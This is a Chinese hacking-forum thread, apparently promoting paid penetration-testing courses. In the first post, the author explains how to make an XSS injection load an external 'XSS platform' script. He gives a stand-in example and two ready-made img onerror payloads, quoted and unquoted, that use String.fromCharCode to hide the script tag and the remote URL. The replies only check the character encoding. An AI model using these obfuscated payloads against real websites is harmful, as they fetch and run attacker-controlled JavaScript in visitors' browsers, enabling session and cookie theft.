资源共享吧|易语言论坛|逆向破解教程|辅助开发教程|网络安全教程|www.zygx8.com|我的开发技术随记

 找回密码
 注册成为正式会员
查看: 1328|回复: 4

[网络安全/渗透测试] XSS漏洞如何在标签内调用xss平台链接

[复制链接]

1

主题

11

帖子

0

精华

资源共享吧金牌老师

Rank: 6Rank: 6

资源币
10
积分
12
贡献
0
在线时间
2 小时
注册时间
2020-3-2
最后登录
2020-4-25

论坛管理员超级版主终身VIP会员

发表于 2020-3-6 17:53:13 | 显示全部楼层 |阅读模式
XSS漏洞如何在标签内调用xss平台链接


<iMg/sRc=1 onerror=1=//www.xxx.com/xxx.js>
今天有学员问如何在标签内调用XSS平台链接,问这样在标签内写上js的网址可以执行吗?答:不行,因为onerror内联事件,写javascript语法。


xss.jpg

解决办法:
<img/src="1"onerror="window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,50,46,106,115);document.body.appendChild(window.s)">

无引号版payload:
<img/src=1 onerror=(function(){window.s=document.createElement(String.fromCharCode(115,99,114,105,112,116));window.s.src=String.fromCharCode(104,116,116,112,58,47,47,49,50,55,46,48,46,48,46,49,47,50,46,106,115);document.body.appendChild(window.s)})()>


ZP培训:https://www.zygx8.com/thread-10128-1-1.html

课程截图:
zp1.jpg

zp2.jpg

回复

使用道具 举报

3

主题

86

帖子

0

精华

终身高级VIP会员

Rank: 7Rank: 7Rank: 7

资源币
90
积分
113
贡献
0
在线时间
18 小时
注册时间
2017-7-25
最后登录
2024-2-18

终身VIP会员

发表于 2020-3-6 18:17:18 | 显示全部楼层
这个编码转换后是    QQ截图20200306181621.png 少了t是你笔误嘛  是的话我在加上这些编码
回复 支持 反对

使用道具 举报

1

主题

11

帖子

0

精华

资源共享吧金牌老师

Rank: 6Rank: 6

资源币
10
积分
12
贡献
0
在线时间
2 小时
注册时间
2020-3-2
最后登录
2020-4-25

论坛管理员超级版主终身VIP会员

 楼主| 发表于 2020-3-6 18:49:35 | 显示全部楼层
如图
图片20200306184819.png
回复

使用道具 举报

1

主题

11

帖子

0

精华

资源共享吧金牌老师

Rank: 6Rank: 6

资源币
10
积分
12
贡献
0
在线时间
2 小时
注册时间
2020-3-2
最后登录
2020-4-25

论坛管理员超级版主终身VIP会员

 楼主| 发表于 2020-3-6 18:50:47 | 显示全部楼层
bkywt1277 发表于 2020-3-6 18:17
这个编码转换后是    少了t是你笔误嘛  是的话我在加上这些编码

如图
图片20200306184819.png
回复 支持 反对

使用道具 举报

3

主题

86

帖子

0

精华

终身高级VIP会员

Rank: 7Rank: 7Rank: 7

资源币
90
积分
113
贡献
0
在线时间
18 小时
注册时间
2017-7-25
最后登录
2024-2-18

终身VIP会员

发表于 2020-3-6 22:22:08 | 显示全部楼层
好的 谢谢
回复

使用道具 举报

 点击右侧快捷回复  

本版积分规则

小黑屋|资源共享吧 ( 琼ICP备2021005790号-1 )

GMT+8, 2024-4-26 06:26 , Processed in 0.060558 second(s), 15 queries , MemCached On.

Powered by Discuz! X3.4 Licensed

Copyright © 2001-2021, Tencent Cloud.

快速回复 返回顶部 返回列表